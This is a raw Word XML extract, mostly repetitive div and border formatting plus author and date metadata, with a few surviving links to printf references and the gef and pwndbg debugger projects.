      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="6346743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791506">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1976522874">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1984456857">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01538166">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2008094131">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2009287587">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2010056937">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23362735">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2029214150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2038266148">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45673141">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2046711341">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48984571">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="402140917">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1587669">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="108597287">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="131480225">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="143547696">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="159010723">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="184903820">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="191694525">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="245960502">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322247201">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="377126150">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="383060820">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="423380650">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="485511786">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="565456257">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="616985654">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="701126047">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="753362178">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="887912472">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="933050325">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="977681710">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="999621761">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1007833097">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1071926161">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1081023190">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1108545106">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1193180194">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1419327455">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1530678678">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1533349223">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1582258647">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1633439399">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1685203411">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1950820430">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2039889155">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2105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271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2065789319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2077511632">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097359404">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2100130939">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2105418904">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="210915537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 w:id="2129275699">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2130127204">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1029379640">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="1125"/>
          <w:marTop w:val="375"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2028631633">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="130431079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n.wikipedia.org/wiki/Printf_format_str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github.com/hugsy/ge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wndbg/pwndb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plusplus.com/reference/cstdio/print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8</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Thanh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Đỗ Thị Thu Hiền</cp:lastModifiedBy>
  <cp:revision>420</cp:revision>
  <cp:lastPrinted>2022-11-01T01:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-10T07:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-01T01:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>